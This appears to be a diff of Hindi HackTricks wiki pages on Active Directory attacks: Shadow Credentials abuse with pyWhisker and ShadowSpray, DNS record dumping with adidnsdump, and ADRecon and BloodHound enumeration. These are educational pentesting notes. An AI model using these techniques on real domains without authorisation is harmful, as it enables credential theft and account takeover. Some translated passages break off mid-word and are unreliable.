HackTricks एक शैक्षिक Wiki है जो Carlos के नेतृत्व में सैकड़ों सहयोगियों के साथ **cyber-security** के बारे में ज्ञान संकलित करता है! यह **hacking tricks का एक विशाल संग्रह** है जिसे समुदाय द्वारा यथासंभव अद्यतन किया जाता है ताकि इसे अद्यतन रखा जा सके. यदि आपको लगता है कि कुछ गायब है या पुराना है, कृपया, [**Hacktricks Github**](https://github.com/carlospolop/hacktricks) पर **Pull Request** भेजें!
हैकट्रिक्स एक शैक्षिक विकि है जो **साइबर सुरक्षा** के बारे में ज्ञान को संकलित करती है जिसे कार्लोस द्वारा संचालित किया जाता है और सैकड़ों सहयोगियों के साथ है! यह एक **बड़ा हैकिंग ट्रिक्स संग्रह** है जिसे समुदाय द्वारा संभाला जाता है ताकि यह सदैव अपडेट रहे। यदि आपको लगता है कि कुछ अभावपूर्ण या पुराना है, कृपया, [**हैकट्रिक्स गिटहब**](https://github.com/carlospolop/hacktricks) पर **पुल अनुरोध** भेजें!
HackTricks एक ऐसी wiki भी है जहाँ **बहुत सारे शोधकर्ता अपनी नवीनतम खोजें भी साझा करते हैं**, इसलिए यह नवीनतम hacking techniques के साथ अद्यतन रहने के लिए एक शानदार जगह है.
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **cybersecurity company** में काम करते हैं? क्या आप अपनी **company का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण तक पहुँचना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) देखें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह
* [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) में शामिल हों या [**telegram group**](https://t.me/peass) में या **Twitter** पर मुझे **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* [hacktricks repo](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी hacking tricks साझा करें.
</details>
हैकट्रिक्स एक विकि भी है जहां **बहुत सारे अनुसंधानी भी अपने नवीनतम खोजों को साझा करते हैं**, इसलिए यह नवीनतम हैकिंग तकनीकों के साथ अपड

File diff suppressed because one or more lines are too long

View file

@ -2,13 +2,13 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की इच्छा है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक विशेष [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल** हों या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके अपना योगदान दें।**
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक पीएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मेरा** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** का पालन करें।**
* **हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**
</details>
@ -16,83 +16,6 @@
इस तकनीक के बारे में [**सभी जानकारी के लिए मूल पोस्ट की जांच करें**](https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab)।
संक्षेप में: यदि आप किसी उपयोगकर्ता/कंप्यूटर के **msDS-KeyCredentialLink** गुण के लिए लिख सकते हैं, तो आप उस ऑब्जेक्ट के **NT हैश** को प्राप्त कर सकते हैं।
**सारांश**: यदि आप किसी उपयोगकर्ता/कंप्यूटर के **msDS-KeyCredentialLink** गुणक में लिख सकते हैं, तो आप **उस ऑब्जेक्ट का एनटी हैश प्राप्त** कर सकते हैं।
इसलिए आप ऑब्जेक्ट के लिए **सार्वजनिक-निजी कुंजी प्रमाणीकरण क्रेडेंशियल्स** सेट कर सकेंगे और उन्हें उपयोग करके एक **विशेष सेवा टिकट** प्राप्त कर सकेंगे जिसमें एनटीएलएम हैश एन्क्रिप्टेड NTLM\_SUPPLEMENTAL\_CREDENTIAL एंटिटी के भीतर निहित होता है जिसे आप डिक्रिप्ट कर सकते हैं।
### आवश्यकताएं <a href="#2de4" id="2de4"></a>
इस तकनीक के लिए निम्नलिखित आवश्यकताएं होती हैं:
* कम से कम एक Windows Server 2016 डोमेन कंट्रोलर।
* डोमेन कंट्रोलर पर सर्वर प्रमाणीकरण के लिए एक डिजिटल प्रमाणपत्र।
* Active Directory में Windows Server 2016 कार्यान्वयन स्तर।
* लक्षित ऑब्जेक्ट के msDS-KeyCredentialLink गुण में लिखने के लिए धारित अधिकार वाले खाते को संक्रमित करें।
## दुरुपयोग
कंप्यूटर ऑब्जेक्ट के लिए Key Trust का दुरुपयोग करने के लिए, खाते के लिए एक TGT और NTLM हैश प्राप्त करने के बाद अतिरिक्त कदम चाहिए होते हैं। सामान्यतः दो विकल्प होते हैं:
1. एक **RC4 सिल्वर टिकट** जालसाजी करें ताकि उच्चाधिकृत उपयोगकर्ताओं को संबंधित होस्ट के लिए अनुकरण कर सकें।
2. TGT का उपयोग करके **S4U2Self** को कॉल करें ताकि उच्चाधिकृत उपयोगकर्ताओं को संबंधित होस्ट के लिए अनुकरण कर सकें। इस विकल्प के लिए, प्राप्त सेवा टिकट में सेवा नाम में एक सेवा वर्ग शामिल करने की आवश्यकता होती है।
Key Trust दुरुपयोग का अतिरिक्त लाभ है कि इसमें एक और खाता को पहुंच दी जाती है जिसे संक्रमित किया जा सकता है - यह **हमारे द्वारा उत्पन्न की गई आकस्मिक कुंजी सीमित होती है**। इसके अलावा, यह एक कंप्यूटर खाता बनाने की आवश्यकता नहीं है जिसे उच्चाध
## [pywhisker](https://github.com/ShutdownRepo/pywhisker) <a href="#7e2e" id="7e2e"></a>
pyWhisker एक Python संस्करण है जो Elad Shamir द्वारा बनाए गए मूल Whisker का समकक्ष है और C# में लिखा गया है। यह उपकरण उपयोगकर्ताओं को लक्ष्य उपयोगकर्ता / कंप्यूटर के msDS-KeyCredentialLink गुणांक को संशोधित करने की अनुमति देता है ताकि उन्हें उस वस्तु पर पूर्ण नियंत्रण मिल सके।
यह Impacket पर आधारित है और podalirius द्वारा बनाए गए Michael Grafnetter के DSInternals का Python संकक्ष है। यह उपकरण, Dirk-jan के PKINITtools के साथ केवल UNIX आधारित सिस्टमों पर पूर्ण प्राथमिक उत्पीड़न की अनुमति देता है।
pyWhisker का उपयोग निम्नलिखित क्रियाओं को msDs-KeyCredentialLink गुणांक पर करने के लिए किया जा सकता है
- *सूची*: सभी मौजूदा KeyCredentials ID और निर्माण समय की सूची बनाएँ
- *जानकारी*: KeyCredential संरचना में सभी जानकारी प्रिंट करें
- *जोड़ें*: msDs-KeyCredentialLink में एक नया KeyCredential जोड़ें
- *हटाएं*: msDs-KeyCredentialLink से एक KeyCredential हटाएं
- *साफ़ करें*: msDs-KeyCredentialLink से सभी KeyCredentials हटाएं
- *निर्यात*: JSON में msDs-KeyCredentialLink से सभी KeyCredentials निर्यात करें
- *आयात*: JSON फ़ाइल से KeyCredentials के साथ msDs-KeyCredentialLink को अधिलेखित करें
pyWhisker निम्नलिखित प्रमाणीकरण का समर्थन करता है:
- (NTLM) साफ पाठशब्द
- (NTLM) पास-द-हैश
- (Kerberos) साफ पाठशब्द
- (Kerberos) पास-द-कुंजी / ओवरपास-द-हैश
- (Kerberos) पास-द-कैश (पास-द-टिकट के प्रकार)
![](https://github.com/ShutdownRepo/pywhisker/blob/main/.assets/add_pfx.png)
{% hint style="info" %}
[**Readme**](https://github.com/ShutdownRepo/pywhisker) पर अधिक विकल्प।
{% endhint %}
## [ShadowSpray](https://github.com/Dec0ne/ShadowSpray/)
कई मामलों में, समूह "Everyone" / "Authenticated Users" / "Domain Users" या कोई अन्य **व्यापक समूह** डोमेन में सभी उपयोगकर्ताओं को सम्प्रदाय में कुछ `GenericWrite`/`GenericAll` DACLs **अन्य वस्तुओं** पर होते हैं। [**ShadowSpray**](https://github.com/Dec0ne/ShadowSpray/) इसलिए उन सभी पर **ShadowCredentials** का दुरुपयोग करने का प्रयास करता है
यह कुछ इस तरह से होता है:
1. प्रदान की गई प्रमाणिकता के साथ डोमेन में **लॉगिन** करें (या मौजूदा सत्र का उपयोग करें)।
2. यह जांचें कि **डोमेन कार्यात्मक स्तर 2016 है** (अन्यथा रुकें क्योंकि Shadow Credentials हमला काम नहीं करेगा)
3. LDAP से डोमेन में सभी वस्तुओं की **सूची इकट्ठा करें** (उपयोगकर्ता और कंप्यूटर)
4. सूची में **प्रत्येक वस्तु** के लिए निम्नलिखित करें:
1. वस्तु के `msDS-KeyCredentialLink` गुणांक में **KeyCredential जोड़ने** का प्रयास करें।
2. यदि उपरोक्त **सफल है**, तो जोड़े गए KeyCredential का उपयोग करके **PKINIT** का अनुरोध करें और जोड़ा गया KeyCredential का उपयोग करके **TGT** अनुरोध करें।
3. यदि उपरोक्त **सफल है**, तो **UnPACTheHash** हमला करें और उपयोगकर्ता / कंप्यूटर **NT हैश** उजागर करें।
4. यदि **`--RestoreShadowCred`** निर्दिष्ट किया गया है: जोड़े गए KeyCredential को हटाएं (अपने आप को साफ करें...)
5. यदि **`--Recursive`** निर्दिष्ट किया गया है: हमारे पास सफलतापूर्वक स्वामित्व में होने वाले प्रत्येक उपयोगकर्ता / कंप्यूटर खाते का उपयोग करके **एक ही प्रक्रिया** करें।
## संदर्भ
* [https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab](https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab)
* [https://github.com/eladshamir/Whisker](https://github.com/eladshamir/Whisker)
* [https://github.com/Dec0ne/ShadowSpray/](https://github.com/Dec0ne/ShadowSpray/)
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप एक **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड** करने की अनुमति चाहिए? [**सदस्यता योज
यह इसलिए है क्योंकि आप ऑब्ज

View file

@ -1,20 +1,20 @@
# AD DNS रिकॉर्ड्स
# AD DNS रिकॉर्ड
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की इच्छा है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का पालन करें**.
* **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके साझा करें**.
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटीज़**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PR जमा करके।
</details>
डिफ़ॉल्ट रूप से **Active Directory में किसी भी उपयोगकर्ता** को डोमेन या फ़ॉरेस्ट DNS ज़ोन में सभी DNS रिकॉर्ड्स की **सूचीकरण** की अनुमति होती है, जो एक ज़ोन ट्रांसफ़र के समान होती है (उपयोगकर्ता AD पर्यावरण में एक DNS ज़ोन के बच्चा ऑब्जेक्ट की सूची बना सकते हैं).
डिफ़ॉल्ट रूप से **किसी भी उपयोगकर्ता** को एक्टिव डायरेक्टरी में **सभी DNS रिकॉर्ड** को **सूचीबद्ध करने** की अनुमति होती है, जैसे कि ज़ोन ट्रांसफ़र (उपयोगकर्ता एडी परिवेश में एक DNS ज़ोन के बच्चे ऑब्जेक्ट्स को सूचीबद्ध कर सकते हैं)।
टूल [**adidnsdump**](https://github.com/dirkjanm/adidnsdump) इंटरनल नेटवर्क के पुनर्निर्धारण के लिए ज़ोन में सभी DNS रिकॉर्ड्स की **सूचीकरण** और **निर्यात** को संभव बनाता है।
उपकरण [**adidnsdump**](https://github.com/dirkjanm/adidnsdump) **सभी DNS रिकॉर्ड** की **सूचीकरण** और **निर्यात** को सक्षम करता है जो आंतरिक नेटवर्क के जासूसी के उद्देश्यों के लिए है।
```bash
git clone https://github.com/dirkjanm/adidnsdump
cd adidnsdump
@ -29,10 +29,10 @@ cat records.csv
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की इच्छा है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **फॉलो** करें मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PR जमा करके
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह देखें
* [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर पर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** का पालन करें**.
* **हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**
</details>

View file

@ -1,14 +1,14 @@
# BloodHound और अन्य AD Enum टूल्स
# BloodHound और अन्य AD Enum टूल
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबरसिक्योरिटी कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे**? या क्या आप PEASS के **नवीनतम संस्करण तक पहुँचना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **[**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) में शामिल हों या [**telegram समूह**](https://t.me/peass) में या मुझे **Twitter** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपनी हैकिंग ट्रिक्स साझा करें, [hacktricks repo](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके।**
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PRs सबमिट करके।
</details>
@ -16,85 +16,72 @@
[AD Explorer](https://docs.microsoft.com/en-us/sysinternals/downloads/adexplorer) Sysinternal Suite से है:
> एक उन्नत Active Directory (AD) व्यूअर और एडिटर। आप AD Explorer का उपयोग AD डेटाबेस को आसानी से नेविगेट करने, पसंदीदा स्थानों को परिभाषित करने, डायलॉग बॉक्स खोले बिना ऑब्जेक्ट प्रॉपर्टीज और एट्रिब्यूट्स देखने, परमिशन्स एडिट करने, ऑब्जेक्ट की स्कीमा देखने और सोफिस्टिकेटेड सर्चेस को एक्जीक्यूट करने के लिए कर सकते हैं जिन्हें आप सेव कर सकते हैं और फिर से एक्जीक्यूट कर सकते हैं।
### स्नैपशॉट्स
AD Explorer AD के स्नैपशॉट्स बना सकता है ताकि आप इसे ऑफलाइन चेक कर सकें।\
इसका उपयोग ऑफलाइन वल्न्स की खोज करने या समय के साथ AD DB की विभिन्न स्थितियों की तुलना करने के लिए किया जा सकता है।
आपको AD से कनेक्ट करने के लिए यूजरनेम, पासवर्ड, और दिशा की आवश्यकता होगी।
AD का स्नैपशॉट लेने के लिए, `File` --> `Create Snapshot` पर जाएं और स्नैपशॉट के लिए एक नाम दर्ज करें।
## ADRecon
****[**ADRecon**](https://github.com/adrecon/ADRecon) एक ऐसा टूल है जो एक AD वातावरण से विभिन्न आर्टिफैक्ट्स निकालता है और संयोजित करता है। इस जानकारी को एक **विशेष रूप से फॉर्मेटेड** Microsoft Excel **रिपोर्ट** में प्रस्तुत किया जा सकता है जिसमें सारांश दृश्य और मेट्रिक्स शामिल होते हैं जो विश्लेषण को सुविधाजनक बनाते हैं और लक्षित AD वातावरण की वर्तमान स्थिति की एक समग्र तस्वीर प्रदान करते हैं।
> एक उन्नत Active Directory (AD) दर्शक और संपादक। आप AD Explorer का उपयोग करके एक AD डेटाबेस में आसानी से नेविगेट कर सकते हैं, पसंदीदा स्थानों को परिभाषित कर सकते हैं, ऑब्ज
```bash
# Run it
.\ADRecon.ps1
```
## BloodHound
> BloodHound एक एकल वेब एप्लिकेशन है जिसमें एक एम्बेडेड React फ्रंटएंड [Sigma.js](https://www.sigmajs.org/) के साथ और एक [Go](https://go.dev/) आधारित REST API बैकएंड है। इसे [Postgresql](https://www.postgresql.org/) एप्लिकेशन डेटाबेस और [Neo4j](https://neo4j.com) ग्राफ डेटाबेस के साथ तैनात किया जाता है, और इसे [SharpHound](https://github.com/BloodHoundAD/SharpHound) और [AzureHound](https://github.com/BloodHoundAD/AzureHound) डेटा कलेक्टर्स द्वारा फीड किया जाता है।
> BloodHound एक मोनोलिथिक वेब एप्लिकेशन है जिसमें एक एम्बेडेड React फ्रंटएंड और [Sigma.js](https://www.sigmajs.org/) के साथ एक [Go](https://go.dev/) आधारित REST API बैकएंड है। इसे एक [Postgresql](https://www.postgresql.org/) एप्लिकेशन डेटाबेस और एक [Neo4j](https://neo4j.com) ग्राफ डेटाबेस के साथ डिप्लॉय किया गया है, और इसे [SharpHound](https://github.com/BloodHoundAD/SharpHound) और [AzureHound](https://github.com/BloodHoundAD/AzureHound) डेटा कलेक्टर्स द्वारा भोजित किया जाता है।
>
>BloodHound ग्राफ सिद्धांत का उपयोग करके एक Active Directory या Azure वातावरण के भीतर छिपे हुए और अक्सर अनजाने में बने संबंधों को प्रकट करता है। हमलावर BloodHound का उपयोग करके आसानी से उन जटिल हमले के मार्गों की पहचान कर सकते हैं जिन्हें अन्यथा जल्दी से पहचानना असंभव होता। डिफेंडर्स BloodHound का उपयोग करके उन्ह हमले के मार्गों की पहचान और उन्हें समाप्त कर सकते हैं। नीली और लाल टीमें दोनों BloodHound का उपयोग करके एक Active Directory या Azure वातावरण में विशेषाधिकार संबंधों की गहरी समझ प्राप्त कर सकते हैं।
>BloodHound ग्राफ सिद्धांत का उपयोग करता है ताकि एक्टिव डायरेक्टरी या एज़्यूर माहौल में छिपी हुई और अक्सर अनजान रिश्तों को प्रकट कर सके। हमलावर BloodHound का उपयोग करके आसानी से उन उच्च जटिल हमले के मार्गों की पहचान कर सकते हैं जो अन्यथा तेजी से पहचानना असंभव होगा। रक्षक BloodHound का उपयोग करके उनी हमले के मार्गों की पहचान और समाप्ति कर सकते हैं। नीला और लाल दल दोनों BloodHound का उपयोग करके एक्टिव डायरेक्टरी या एज़्यूर माहौल में विशेषाधिकार संबंधों की गहरी समझ प्राप्त करने के लिए आसानी से कर सकते हैं।
>
>BloodHound CE को [BloodHound Enterprise Team](https://bloodhoundenterprise.io) द्वारा बनाया गया है और रखरखाव किया जाता है। मूल BloodHound को [@\_wald0](https://www.twitter.com/\_wald0), [@CptJesus](https://twitter.com/CptJesus), और [@harmj0y](https://twitter.com/harmj0y) द्वारा बनाया गया था।
>BloodHound CE को [BloodHound Enterprise Team](https://bloodhoundenterprise.io) ने बनाया और बनाए रखा है। मूल BloodHound को [@\_wald0](https://www.twitter.com/\_wald0), [@CptJesus](https://twitter.com/CptJesus), और [@harmj0y](https://twitter.com/harmj0y) ने बनाया था।
>
>[https://github.com/SpecterOps/BloodHound](https://github.com/SpecterOps/BloodHound) से
>स्रोत: [https://github.com/SpecterOps/BloodHound](https://github.com/SpecterOps/BloodHound)
तो, [Bloodhound](https://github.com/SpecterOps/BloodHound) एक अद्भुत उपकरण है जो स्वचालित रूप से एक डोमेन को सूचीबद्ध कर सकता है, सभी जानकारी को सहेज सकता है, संभावित विशेषाधिकार वृद्धि मार्गों का पता लगा सकता है और सभी जानकारी को ग्राफ़ का उपयोग करके दिखा सकता है।
इसलिए, [Bloodhound](https://github.com/SpecterOps/BloodHound) एक अद्वितीय उपकरण है जो एक डोमेन को स्वचालित रूप से गणना कर सकता है, सभी जानकारी को सहेज सकता है, संभावित विशेषाधिकार उन्नयन मार्गों को खोज सकता है और ग्राफ का उपयोग करके सभी जानकारी को दिखा सकता है।
